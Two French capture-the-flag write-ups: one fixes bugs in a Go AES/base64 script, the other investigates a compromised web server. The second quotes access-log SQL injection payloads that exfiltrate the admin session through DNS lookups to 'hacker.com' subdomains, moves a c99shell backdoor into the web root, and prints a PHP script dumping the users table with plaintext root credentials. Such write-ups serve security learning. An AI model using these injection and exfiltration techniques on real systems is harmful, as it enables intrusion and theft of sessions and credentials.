---
author: Ronan Pantaleon
title: Coffre_fort_secret
date: 2022-11-24
description: write-up
---

- [intro](#intro)
- [correctif](#correctif)
- [Et c'est validé !](#et-cest-validé-)
- [description: write-up](#description-write-up)
- [introduction](#introduction)
- [énumération](#énumération)
  - [web](#web)
  - [serveur](#serveur)
- [recherches](#recherches)
- [illumination](#illumination)
- [exploit](#exploit)

## intro
langage : Go 

Une page web présentant un éditeur de code en ligne, et un bouton de soumission.
Le script encode & décode du texte passé en argument., via aes & base64 


Soumettre le code l'éxécute du côté du serveur, nous affichant le retour de l'éxécution (détails des bugs, num de ligne etc...).
Il nous est demandé quelques corrections sur celui-ci.

N'ayant jamais écris de Go, parfaite occasion d'apprendre sur le tas, le débugger étant explicite
## correctif
Au total 4 erreurs de repérées : 

1. ligne 85 : '\n' -> "\n"
un simple guillemet étant interprété comme un byte ou prune : [link](https://golangbyexample.com/double-single-back-quotes-go/)
2. ligne 22 : if err == nil {
		panic(err)} -> if err != nil etc...
3. ligne 66 : un n se ballade tout seul, qu'on supprime
4. dernière fonction du script : si base64 décode; encode -> si base64 {decode}else{encode}.

Et c'est validé ! 
---
author: Ronan Pantaleon
title: Shadow4DGA (niveau 1)
date: 2022-11-24
description: write-up
---

- [intro](#intro)
- [correctif](#correctif)
- [Et c'est validé !](#et-cest-validé-)
- [description: write-up](#description-write-up)
- [introduction](#introduction)
- [énumération](#énumération)
  - [web](#web)
  - [serveur](#serveur)
- [recherches](#recherches)
- [illumination](#illumination)
- [exploit](#exploit)

## introduction
détection challenge 

Première parti d'une immersion sur un serveur web post-exploitation. Une fuite d'infos semble avoir mené un clandestin sur le serveur, notre mission est d'identifier son parcours.


A notre disposition nous avons : 
- un service web : 
  - une page d'accueil, nous proposant le téléchargment d fichiers sous réserve d'en posséder l'id et password (8caracs)
  - une page admin, identifiants requis :cry: 
  - un couple id/passwd
  - un accès ssh au serveur (pas de root, un simple user "app")
## énumération
### web 
Le couple fourni correspondant à un fichier sur le serveur, on le récupère, et nous voici muni d'un accès à l'interface admin ! 
id : 
passwd : 
La page nous donne accès aux autres pdf disponible (5), ainsi qu'à un function d'upload, restreint à l'admin seulement

### serveur 
A peine arrivé sur le serveur (`/home/app`), on part en repérage : 

1. .bash_history : nous présente quelques actions de l'attaquant, on y trouve notamment un...YAHOUUUUUUUUU LE FLAG en guise de première commande, curieux mais soit...RICKROLL :angry: l'utile sera donc : un `nano admin.php` précédé d'une ref à  `/var/www/shadow4dga`
2. .local -> Trash -> c99shell.php : backdoor repéré par l'admin je suppose.
On peut la déplacer dans le dossier courant du service web pour y accéder en ligne : `mv c99shell.php /var/log/www/shadow`
1. `/var/www/shadow4dga` : service web, plutôt classique 
  - block_system/ : contient les pdfs protégés, l'un d'eux contient du php, et requête un repos github désormais familier : c99shell.php
  - includes/ : des **identifiants mySQL** en clair dans un fichier php, et un second script de **log** SQL, encodé en base64.
1. `/var/log/web/` : sait-on jamais, des fois que les logs contiennent quelques traces. Visiblement quand faut casser pas de soucis, la discrétion on repassera : 
`cat access.log` quelques unions et select apparues brièevemet me poussent à fouiller : `| grep admin` -> 
```
174.10.50.30 - - [17/Jun/2022:21:12:41 +0200] "GET /admin.php?limit=10&offset=0 HTTP/1.1" 200 6236 "-" "Mozilla/0.0 (Windows NT 0.0; Win99; x12) AppleWebKit/007.01 (KHTML, like Gecko) Chrome/01.1.1234.12 Safari/007.01" "-"
174.10.50.30 - - [17/Jun/2022:21:26:57 +0200] "GET /admin.php?limit=10&offset=0);CREATE%20PROCEDURE%20exf(data%20varchar(100))%20BEGIN%20SELECT%20LOAD_FILE(CONCAT('%5C%5C',data,'%5Ca'));END;select%200,NULL,NULL;-- HTTP/1.1" 200 6236 "-" "Mozilla/0.0 (Windows NT 0.0; Win99; x12) AppleWebKit/007.01 (KHTML, like Gecko) Chrome/01.1.1234.12 Safari/007.01" "-"
174.10.50.30 - - [17/Jun/2022:21:28:57 +0200] "GET /admin.php?limit=10&offset=0);CALL%20exf('beginexf.hacker.com'));select%200,NULL,NULL;-- HTTP/1.1" 200 6236 "-" "Mozilla/0.0 (Windows NT 0.0; Win99; x12) AppleWebKit/007.01 (KHTML, like Gecko) Chrome/01.1.1234.12 Safari/007.01" "-"
174.10.50.30 - - [17/Jun/2022:21:31:08 +0200] "GET /admin.php?limit=10&offset=0);CALL%20exf(CONCAT(SUBSTRING((select%20session%20from%20users%20where%20username='admin'),1,63),'.hacker.com'));select%200,NULL,NULL;-- HTTP/1.1" 200 6236 "-" "Mozilla/0.0 (Windows NT 0.0; Win99; x12) AppleWebKit/007.01 (KHTML, like Gecko) Chrome/01.1.1234.12 Safari/007.01" "-"
174.10.50.30 - - [17/Jun/2022:21:33:19 +0200] "GET /admin.php?limit=10&offset=0);CALL%20exf(CONCAT(SUBSTRING((select%20session%20from%20users%20where%20username='admin'),64,63),'.hacker.com'));select%200,NULL,NULL;-- HTTP/1.1" 200 6236 "-" "Mozilla/0.0 (Windows NT 0.0; Win99; x12) AppleWebKit/007.01 (KHTML, like Gecko) Chrome/01.1.1234.12 Safari/007.01" "-"
174.10.50.30 - - [17/Jun/2022:21:35:19 +0200] "GET /admin.php?limit=10&offset=0);CALL%20exf(CONCAT(SUBSTRING((select%20session%20from%20users%20where%20username='admin'),127,63),'.hacker.com'));select%200,NULL,NULL;--https://174.10.50.1/admin.php?limit=10&offset=0);CALL%20exf('endexf.hacker.com'));select%200,NULL,NULL;-- HTTP/1.1" 200 6236 "-" "Mozilla/0.0 (Windows NT 0.0; Win99; x12) AppleWebKit/007.01 (KHTML, like Gecko) Chrome/01.1.1234.12 Safari/007.01" "-"
174.10.50.30 - - [17/Jun/2022:21:37:31 +0200] "GET /admin.php?limit=10&offset=0);CALL%20exf('hacked.hacker.com');select%200,NULL,NULL;-- HTTP/1.1" 200 6236 "-" "Mozilla/0.0 (Windows NT 0.0; Win99; x12) AppleWebKit/007.01 (KHTML, like Gecko) Chrome/01.1.1234.12 Safari/007.01" "-"
```
oh la belle injection ! 
Le bougre est allé jeté un oeil à la **session** de l'admin...

## recherches
S'en suit quelques jours de galère, à la recherche du pattern DGHACK{} : 
- ai tenté de rejouer quelques requêtes sur la page admin, m'amenant à un nouveau "faux" flag et un accès à de nouveaux pdf. J'en conclus que j'ai l'accès admin, bien que bredouille
- après fouille des documents mis à disposition, rien de bien utile : rapports wikileaks, blagues présidentielles, espionnage au sommet que de lectures passionnantes mais pas de flag
- utilisation du c99shell.php, mais nous n'y gagnons pas de privilèges root, et le module sql semble inopérationnel

## illumination
Un cruel manque d'éfficacité se fait sentir, faisons le point :
- l'attaquant s'est 
1. procuré des identifiants de connexion (qu'il a partagé dans un élan de bonté et d'éthique open-source)
2. connecté à la page admin
3. exploité une injection sql pour récupéré la session de l'admin
4. poster un hybride pdf-php, pour télécharger sa backdoor c99shell

relisez la 3, souvenez vous qu'on cherche ce que l'attaquant a exfiltré, au boulot révision sql ! 
J'ai reécris la page logout.php, afin d'y dumper le contenue de leur db.
## exploit
```
<?php
try
{
	// On se connecte à MySQL
	$mysqlClient = new PDO('mysql:host=192.169.1.101;dbname=shadow4dga;charset=utf8', 'root', 'JV87HtoF@2x@UELUeZs@iDV2EhzT@S');
}
catch(Exception $e)
{
	// En cas d'erreur, on affiche un message et on arrête tout
        die('Erreur : '.$e->getMessage());
}

// Si tout va bien, on peut continuer

// On récupère tout le contenu de la table users
$sqlQuery = 'SELECT * FROM users';
$recipesStatement = $mysqlClient->prepare($sqlQuery);
$recipesStatement->execute();
$recipes = $recipesStatement->fetchAll();

// On affiche chaque info une à une
foreach ($recipes as $recipe) {
?>
    <p><?php print_r($recipe); ?></p>
<?php
}
?>
```
On y récupère le contenu de la table users : username, password et session
DGHACK{session_admin} et le tour est joué ! 

